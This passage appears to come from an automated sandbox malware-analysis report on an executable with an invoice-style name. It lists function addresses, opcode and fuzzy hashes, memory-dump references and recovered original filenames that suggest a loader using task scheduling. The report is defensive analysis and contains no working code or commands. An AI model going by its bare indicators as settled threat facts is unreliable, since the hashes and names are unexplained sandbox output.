Opcode ID: c66de54156ba7256fc00c38a62795ca597100f6c5ce90dac9ab779dc2f199220
Instruction ID: 87e8927fb9d0e9d3e187a3c1cf8ed5d9637d7053bcc747f2253851ed0bc597de
Opcode Fuzzy Hash: c66de54156ba7256fc00c38a62795ca597100f6c5ce90dac9ab779dc2f199220
Instruction Fuzzy Hash: 2C21BD7100A345DFC3A94FB0D8066A6BFF9FB55224B6508ADE0C2CA872E3641484CFE2

Function 06312EB5 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983173645.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6310000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7f0d34eb03bed2a931ee29334e489cb9452d68e23fa7d8abdf0e6b1b86e8d0
Instruction ID: 80483f08d8da9dea7cd89ba47b678611df7acabd3001f1e66c1760db49bcc790
Opcode Fuzzy Hash: 9d7f0d34eb03bed2a931ee29334e489cb9452d68e23fa7d8abdf0e6b1b86e8d0
Instruction Fuzzy Hash: 60218E7100A391AFC7569BB08C519CB7FF5DF5B20472904AEE8D6DE022E6254545CBA1

Function 06201160 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae6f8aba08329eb2a6ea13fe0ca33f947d931561d0159793f6fc081e302dfd7
Instruction ID: 8967f396d1e02d8b93edf2f90b942affe0c13e0eab30ec46bb649965c24ab2ad
Opcode Fuzzy Hash: 6ae6f8aba08329eb2a6ea13fe0ca33f947d931561d0159793f6fc081e302dfd7
Instruction Fuzzy Hash: 873156B1D156288BEB68DF6BCD5878EFAF6BFC8304F04C1A9D40CA6255DB7409858F40

Function 06300007 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac14886cbc07dddaa04dcd56f14466ef51b1033df08e7c8b4365a90eb28035f
Instruction ID: ef8270291714eab4e2f53926621a11ba5af3d011d6238ea31230c3208d9779b3
Opcode Fuzzy Hash: aac14886cbc07dddaa04dcd56f14466ef51b1033df08e7c8b4365a90eb28035f
Instruction Fuzzy Hash: BC211D7190A3549FE759CF268C107DABFB7AF8A210F05C0EAD449AB262D7340949CF61

Function 0659FDC8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f510c09c7f8d483e9c87b3236849eeeb4d87694d3ee91f42c2f3a96683d1573b
Instruction ID: 85bb2e6261c01ebb1b5c30608e4e8586ed64fa977c6a65daf4a0ae74e10d1648
Opcode Fuzzy Hash: f510c09c7f8d483e9c87b3236849eeeb4d87694d3ee91f42c2f3a96683d1573b
Instruction Fuzzy Hash: 9621DDB5D102089FCF54DFA9D881ADEBBF5FB49320F10905AE819B7240CB356905CFA4

Function 06201150 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc23beda177af776e755863a840db717b744d587d7ab92f8c7aab839b3a60b2
Instruction ID: f6e3d8c813d4a270c6a0678e8b90a7f26e3dd76dc900bbd14aafafb83c065166
Opcode Fuzzy Hash: ccc23beda177af776e755863a840db717b744d587d7ab92f8c7aab839b3a60b2
Instruction Fuzzy Hash: 0C3166B1D016588BEB68CF6BCD5879EFAF3BFC8304F14C1AAC408AA255DB7509568F40

Function 0631DFD5 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983173645.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6310000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd4d7ab2ea5531f6f9fa2827a5bdca6772161dffc81b8d36dfdb19c0a3b06971
Instruction ID: da5b4c9bd5340baafd534db6a8620e6f781f159e6669e3d52853a025de45e534
Opcode Fuzzy Hash: bd4d7ab2ea5531f6f9fa2827a5bdca6772161dffc81b8d36dfdb19c0a3b06971
Instruction Fuzzy Hash: E3110F311453539FE7A98F74880298ABFE5EF6A258375086DD4C3CA631E2A55482DBA0

Function 0620CED5 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5544b3acc76c5c51e7019778b50f62dc632bb0960bdabdf436da12e3e33569
Instruction ID: 79de4b73d4d15cd9b81f72d5257d768c536ed44f77af399805322753a153fd54
Opcode Fuzzy Hash: cd5544b3acc76c5c51e7019778b50f62dc632bb0960bdabdf436da12e3e33569
Instruction Fuzzy Hash: 902110B1E056589BEB59CF6BCC042D9FBF7AFC9310F08C1AAD808AA255DB300A45CF51

Function 0659FDD0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddedbdfd0815b0e56e01ceba805883a1d710fd9e83705beeba9860100e85ad1d
Instruction ID: db00af179e20aace1ea9305d44f9da7a289bafaf7b4b476799a23f2f000ed1c9
Opcode Fuzzy Hash: ddedbdfd0815b0e56e01ceba805883a1d710fd9e83705beeba9860100e85ad1d
Instruction Fuzzy Hash: 0521DEB5D002089FCF14DFA9D880ADEFBF4BB49310F10901AE819B7240C7356905CFA4

Function 0659C290 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fde17a6a0837274920133e7ccc54aa425341f16c106b116120e958b6f0b9d60
Instruction ID: ee7f586f27bf5962f9792f37351e0fac13dfac26903a80bd11302e73d4c904b5
Opcode Fuzzy Hash: 6fde17a6a0837274920133e7ccc54aa425341f16c106b116120e958b6f0b9d60
Instruction Fuzzy Hash: B821C8B1E016289BEB28CFABCC4479EFAF7BFC9310F14C469D408AA254DB7409458F51

Analysis Process: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exePID: 8060, Parent PID: 2580COMMON

Executed Functions

Function 02CA1D40 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

Tedq, xrefs: 02CA1E4C
Tedq, xrefs: 02CA1E13

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Tedq$Tedq
API String ID: 0-4137347946
Opcode ID: 18f368bc879d71b49f58bf43fde985fec3b91a190a56cacc009e51695879e4b1
Instruction ID: aba533658ea0da2b6cf4d83c1f9200b865e53b6b58fc2b4a7e0c106f34336251
Opcode Fuzzy Hash: 18f368bc879d71b49f58bf43fde985fec3b91a190a56cacc009e51695879e4b1
Instruction Fuzzy Hash: A0413E74A101058FCB44DF79D5A8AAEBBF6BF8D314F2544A9E406AB3A5CB719D00CF90

Function 02CA21F0 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

Dkq, xrefs: 02CA227F

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Dkq
API String ID: 0-2786294174
Opcode ID: b3d39942ba7a8ba8a242f0d5958ab7e7c989bb16355471c8ea97a00758792e33
Instruction ID: 5742ff6f52bc413a666924b22a5d1ebb52cad5d93674024b2d6e6c41aee7cdbd
Opcode Fuzzy Hash: b3d39942ba7a8ba8a242f0d5958ab7e7c989bb16355471c8ea97a00758792e33
Instruction Fuzzy Hash: D2A1C374B006259FCB14DF69E594A5EBBF2FF88314F118569E806AB3A4DB30EC01CB91

Function 02CA21E0 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

Dkq, xrefs: 02CA227F

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Dkq
API String ID: 0-2786294174
Opcode ID: 7108fb6889eda1ef30448b3232d55e34aa47f41171883cc224797cf47ed43f06
Instruction ID: 5c14f05e904fcf50082ae8a50a3fd00ac8437606d9f6f11a7f73af75eeb53237
Opcode Fuzzy Hash: 7108fb6889eda1ef30448b3232d55e34aa47f41171883cc224797cf47ed43f06
Instruction Fuzzy Hash: 9F617074600621CFCB14EF29E594A5DBBF2BF88314B1585A9D81AEB365DB30EC41CF91

Function 02CA569C Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02443f42d9af8b37a7ca367bff2946e7df9d8b7273aa18e0b26d23e6adc5f03e
Instruction ID: e55022e47a7c08299cca98a3d14c0a20b481b1aece4370f7fe2b8eb8410c5726
Opcode Fuzzy Hash: 02443f42d9af8b37a7ca367bff2946e7df9d8b7273aa18e0b26d23e6adc5f03e
Instruction Fuzzy Hash: 0F113D70D05245DFDB04DFBAE498399BBF2FB55358F51C0AAC0069B264E7744A85CF01

Function 0129D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2910492469.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b2b521b5703799183cfcf5ec5c55b89f11a189ea73b76a674928c32b4a7bd04
Instruction ID: d2dd4bc4df7f0f60fe415fea3684089b7c77f7c391fa0e4ce0a87df682e272f1
Opcode Fuzzy Hash: 5b2b521b5703799183cfcf5ec5c55b89f11a189ea73b76a674928c32b4a7bd04
Instruction Fuzzy Hash: 5E2145B1510208EFCF05DF5CD9C0B66BFA5FB94324F20C568E9090B246C336E456DBA1

Function 0129D3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2910492469.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_129d000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 0b729b982d26b014840c6a56adcad95e29c2613a42d28c62aadb1c7e4e324cc0
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 7F11EE76504284CFCF06CF58D9C4B56BF72FB84324F24C6A9D9090B656C33AE45ADBA2

Function 02CA0911 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b473f682d5da790be5423eef6771ef3b2291fd328bf4f9e2fdcf8963364fa8
Instruction ID: 84f8f002b2ed590a2b5ed02fa9391c294feb7d58169d21fb01a188abee5fad5d
Opcode Fuzzy Hash: d1b473f682d5da790be5423eef6771ef3b2291fd328bf4f9e2fdcf8963364fa8
Instruction Fuzzy Hash: 9B115A747002158FDB11EB39D8A87AB7BE6BF99345B10856CE406DB358EB309D048BA2

Function 02CA0920 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d380699a1ddc3e0821d4ecf2e13eff1f7ea23a6b1b7f571a7e22238547a8711
Instruction ID: 19712251dfd4018d1033a89f19848d8e8e5e2c6f190da4306413eddef3c438e9
Opcode Fuzzy Hash: 0d380699a1ddc3e0821d4ecf2e13eff1f7ea23a6b1b7f571a7e22238547a8711
Instruction Fuzzy Hash: B301B5747002158FDB10EB7AD86475B7BE6BF98344B108528E506DB358EF309D00CBA1

Function 02CA5958 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd551709dc38908d2cbab3bcf15e807a951a48f6175e811b116542a6041c5024
Instruction ID: 3bf29b52c5b212fcf4c1b8c9bd9cbbb0a2699344a43d9d575b8cf19f83fe716c
Opcode Fuzzy Hash: dd551709dc38908d2cbab3bcf15e807a951a48f6175e811b116542a6041c5024
Instruction Fuzzy Hash: D9110C70D14109DFDB04DFBAE09839DBBF6FB44398FA1C0AAC0069B254EB744A86CB41

Function 02CA093A Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4ff9c31379c5fd16c77ea6685a241ac13e44a8cc29ccb4d01f99689769c7e1
Instruction ID: a1c57aec7e3caff96e45eb1a6f3c4097da630e0f11ed74243a633c070cfd0739
Opcode Fuzzy Hash: cb4ff9c31379c5fd16c77ea6685a241ac13e44a8cc29ccb4d01f99689769c7e1
Instruction Fuzzy Hash: CF012435640106CFE724DF65D969BA9BBB1BF98398F2100A9E102EB3B1CB719D41CB50

Function 02CA109E Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e10041263e55012bb930b119934154e780b69c9992e976d87099501536ac79
Instruction ID: 541bfeff0faf8236438509a96df66d740daba19b9ca198ab6f2e4e91063a3986
Opcode Fuzzy Hash: 85e10041263e55012bb930b119934154e780b69c9992e976d87099501536ac79
Instruction Fuzzy Hash: D101F974D140928FD744EB2AE0983A573E1FF95348F5AC165D4065F789DA34CC138782

Function 02CA1CB8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83895f3621f0d079bff209c38b3a342471f7ca914d2943435eea2ce871a2eedf
Instruction ID: 46b0e72f60541aaa2c4fededa0a5f7c7aed4595156e09463c7d9fce248e8b002
Opcode Fuzzy Hash: 83895f3621f0d079bff209c38b3a342471f7ca914d2943435eea2ce871a2eedf
Instruction Fuzzy Hash: 64F01CB42052548FC341DF78E5988553FE9BF4E2143154596E405CB369DA22EC008BA2

Function 02CA2EA9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c1754a6e16be16d49a0896c47e47176007a9d19700420ac4a13215c34d082f
Instruction ID: f12ef2768825dd2e341f910e9cad919f9d19f8b6cf12d32f9d98f30e7a1aab7e
Opcode Fuzzy Hash: d7c1754a6e16be16d49a0896c47e47176007a9d19700420ac4a13215c34d082f
Instruction Fuzzy Hash: ADF0393460015A9FDB08EBA9E5789BDB7B2FB85324F104265ED12A73A0CB359D41CB02

Function 02CA0878 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8103ac84b3e9a1a9ad24fe224a16de5ed3c15dcba8d31beacdf05bf1572710
Instruction ID: 8273ebe60d3cae36a32657209462f8dcc344572f795eb81139b0c33194991476
Opcode Fuzzy Hash: 3c8103ac84b3e9a1a9ad24fe224a16de5ed3c15dcba8d31beacdf05bf1572710
Instruction Fuzzy Hash: CFE06D71D15249EFCB01FBB5E5A915C7BB1FF56341B004AE9D009DF215EA300E04DB82

Function 02CA1D0A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f700cc005336857628421b04827bd347f02e6deb2af33b52db76cbbe504d5f
Instruction ID: 20ecaafa8af5a6951bac1322e9fd59beb550e308c523e4c4ae9abfdd4958bf72
Opcode Fuzzy Hash: 44f700cc005336857628421b04827bd347f02e6deb2af33b52db76cbbe504d5f
Instruction Fuzzy Hash: 0CE08C306052408FCB02AB78E49C4483FF5EF8B21830101EAE409CB2B6DA32AC01CB92

Function 02CA0888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef856cc63cfbf4cd27d37444591bcbdc17473d9f0b0046462dc633296949dbd
Instruction ID: d356b875d9d9038f06d99554050864eab04db9e54b4aea64ed00b94b96c29b0e
Opcode Fuzzy Hash: 0ef856cc63cfbf4cd27d37444591bcbdc17473d9f0b0046462dc633296949dbd
Instruction Fuzzy Hash: 2AE04670911209EF8B00FBA9E59856C77B5FF01346B004A99D409EF204EA301E008B81

Function 02CA1D18 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30eb8ee7d170d205263910194a30fce4e2cc4a74344195ef90c4aa8068c023e7
Instruction ID: 8edd2f5586ff18fcf210644dcb1742955e710dec69cacd00ed270ab6d232a620
Opcode Fuzzy Hash: 30eb8ee7d170d205263910194a30fce4e2cc4a74344195ef90c4aa8068c023e7
Instruction Fuzzy Hash: 61D0C9357102149FCB14ABB9E48C85937EAAF8966530001A5F90ADB364EF35AC018B91

Function 02CA0A50 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3611e6c1933923686ff4fedb8458411515d887693bdebb4da63f3f30fb4f23
Instruction ID: f8137f7fe224d90cf07d3213416263cc0d86e81777e2b529d9a69cddd4eafbc1
Opcode Fuzzy Hash: bb3611e6c1933923686ff4fedb8458411515d887693bdebb4da63f3f30fb4f23
Instruction Fuzzy Hash: CEC012310087818FCB528BB8A8E82403FB8AD0B32030900D7D048DB867E2212820DB22

Function 02CA654F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5a3534e3467c738988d3a46a7a50a8d332523426cddf110cac8bc5dabf4ae0
Instruction ID: f7b7c019f0a8ebd00a9547a4c30c9f3723e22db2c3bd239863dc7927958716df
Opcode Fuzzy Hash: 7f5a3534e3467c738988d3a46a7a50a8d332523426cddf110cac8bc5dabf4ae0
Instruction Fuzzy Hash: 50C002F4A043058BDFA45B75A09C2597AB5EB4930AB4044AAEA06D3388DA3849808B05

Function 02CACE10 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d95977704b7765412ef76f87b79dc55b2769dcc494c8240b2227c2a4250129
Instruction ID: 018672dae6293a9379a7c730073869df3d08a1c767fe2b3b46ec6e1c3ce762ff
Opcode Fuzzy Hash: 18d95977704b7765412ef76f87b79dc55b2769dcc494c8240b2227c2a4250129
Instruction Fuzzy Hash: 7CA02230003B0C82820032B8A000020B38C080222E3C000B8820C0CB200833E0A0C888

Function 02CA0A60 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2911133616.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ac2582c565dd7ff04ac0722991fe9802ec478846613cdfe3e5d43c74dd75c7
Instruction ID: b289a0f1512377b13e659ce3391d311fa20a602c5d2f00fb8e2a13bbc19aea15
Opcode Fuzzy Hash: 46ac2582c565dd7ff04ac0722991fe9802ec478846613cdfe3e5d43c74dd75c7
Instruction Fuzzy Hash: BD90023504460C8B4A502795785D655776CA5447157840055A60D51545AA5574204695

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Binary or memory string: OriginalFilename vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1982192329.0000000005E80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAnyfonniua.dll" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1958891092.000000000137E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1980874341.0000000004578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFmjetpfxwt.exe" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000037AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFmjetpfxwt.exe" vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
